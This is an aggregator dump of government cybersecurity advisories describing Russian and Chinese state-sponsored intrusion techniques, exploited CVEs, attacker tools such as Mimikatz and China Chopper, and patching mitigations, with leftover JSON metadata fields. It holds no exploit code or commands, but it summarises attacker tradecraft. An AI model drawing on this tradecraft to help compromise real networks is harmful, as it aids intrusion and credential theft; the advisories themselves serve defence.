[[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. 
They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. 
\nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-09-23T07:31:00", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. 
This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).

### Key Takeaways

* Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.
* Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.
* Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.
* If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or to use previously unknown vulnerabilities to target a network.
* This Advisory identifies some of the more common, yet most effective, TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.

[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.

### Technical Details

Through the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.

According to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries (including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense) in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]

According to the indictment,

_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents' names and extensions (e.g., from ".rar" to ".jpg") and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks' "recycle bins." The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._

The continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to researching unknown vulnerabilities and developing custom exploitation tools.

### MITRE PRE-ATT&CK® Framework for Analysis

In the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK® Framework TTPs.

#### Target Selection and Technical Information Gathering

_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors' motivations and intents are often unknown, they often make their selections based on the target network's security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposures (CVE) database, and the National Vulnerability Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]

* Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.
* The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments of the impact if any of the recorded vulnerabilities are successfully exploited.

These information sources have legitimate uses for network defense.
CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.

While using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with an understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.

CISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).

_Table 1: Technical information gathering techniques observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>) | Determine Approach/Attack Vector | The threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. |
| [T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>) | Acquire Open Source Intelligence (OSINT) Data Sets and Information | CISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. |
| [T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>) | Conduct Active Scanning | CISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. |

#### Technical Weakness Identification

CISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)]

Additionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.

_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_

| Vulnerability | Observations |
|---|---|
| CVE-2020-5902: F5 Big-IP Vulnerability | CISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5's Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)] |
| CVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances | CISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)] |
| CVE-2019-11510: Pulse Secure VPN Servers | CISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510, an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances, to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)] |
| CVE-2020-0688: Microsoft Exchange Server | CISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection from targeted networks. |

Additionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification_ [[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]).

_Table 3: Technical weakness identification techniques observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>) | Analyze Architecture and Configuration Posture | CISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for network appliances vulnerable to CVE-2019-11510. |
| [T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>) | Research Relevant Vulnerabilities | CISA has observed the threat actors scanning and conducting reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. |

#### Build Capabilities

CISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities_ [[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.

_Table 4: Build capabilities observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>) | C2 Protocol Development | CISA observed beaconing from a Federal Government entity to the threat actors' C2 server. |
| [T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>) | Buy Domain Name | CISA has observed the use of domains purchased by the threat actors. |
| [T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>) | Acquire and/or Use of 3rd Party Infrastructure | CISA has observed the threat actors using virtual private servers to conduct cyber operations. |
| [T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>) | Obtain/Re-use Payloads | CISA has observed the threat actors use and reuse existing capabilities. |
| [T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>) | Build or Acquire Exploit | CISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. |

### MITRE ATT&CK Framework for Analysis

CISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com>)][[11](<https://exploit-db.com>)] Both repositories are commonly used for legitimate development, penetration testing, and open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.

During incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.

_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_

**[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)**: CISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations.
It contains a number of tools that complement the cyber threat actor's exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers.

**[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)**: CISA has observed the actors successfully deploying China Chopper against organizations' networks. This open-source tool can be downloaded from internet software repositories such as GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords.

**[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)**: CISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks, which allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/>)]

The following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations, as observed by CISA analysts.

#### Initial Access

In the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.

CISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.

_Table 6: Initial access techniques observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>) | User Execution: Malicious Link | CISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent. |
| [T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>) | Phishing: Spearphishing Link | CISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. |
| [T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>) | Exploit Public-Facing Application | CISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. |

Cyber threat actors can continue to successfully launch these types of low-complexity attacks, as long as misconfigurations in operational environments and immature patch management programs remain in place, by taking advantage of common vulnerabilities and using readily available exploits and information.

#### Execution

CISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.

CISA has observed Chinese MSS-affiliated actors using the _Execution_ [[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.

_Table 7: Execution technique observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>) | Software Deployment Tools | CISA observed activity from a Federal Government IP address beaconing out to the threat actors' C2 server, which is usually an indication of compromise. |

#### Credential Access

Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.

CISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.

_Table 8: Credential access techniques observed by CISA_

| MITRE ID | Name | Observation |
|---|---|---|
| [T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>) | Operating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory | CISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. |
| [T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>) | Brute Force: Credential Stuffing | CISA observed what was likely a brute-force attack against a Remote Desktop Protocol (RDP) service on a public-facing server. |

#### Discovery

As with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable; there are a multitude of open-source scanning and reconnaissance tools available to them for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques.
CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actor\u2019s carefully choose proxy tools depending on their intended use. 
These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. 
For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).

_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_

| Vulnerability | Vulnerable Products | Patch Information |
|---|---|---|
| [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) | [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) |
| [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix Application Delivery Controller<br>Citrix Gateway<br>Citrix SDWAN WANOP | [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)<br>[Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)<br>[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)<br>[Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) |
| [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15<br>Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15 | [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) |
| [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | Microsoft Exchange Servers | [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) |

CISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors' operations and protect organizations' resources and information systems.

### Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI's 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).

### Revisions

September 14, 2020: Initial Version

Advisory AA20-258A: Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity, <https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a>

### Summary

_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9, and MITRE D3FEND™ framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._

The National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People's Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions.
These cyber operations support China's long-term economic and military development objectives.

This Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.

To increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.

[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.

### Technical Details

#### **Trends in Chinese State-Sponsored Cyber Operations**

NSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:

 * **Acquisition of Infrastructure and Capabilities.** Chinese state-sponsored cyber actors remain agile and cognizant of the information security community's practices.
These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.

 * **Exploitation of Public Vulnerabilities.** Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability's public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:
   * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),
   * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and
   * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).
 * **Encrypted Multi-Hop Proxies.** Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.

#### **Observed Tactics and Techniques**

Chinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors.
A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).

Refer to Appendix A: Chinese State-Sponsored Cyber Actors' Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.

_Figure 1: Example of tactics and techniques used in various cyber operations._

### Mitigations

NSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:

 * **Patch systems and equipment promptly and diligently.** Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. **Note:** for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors, refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.
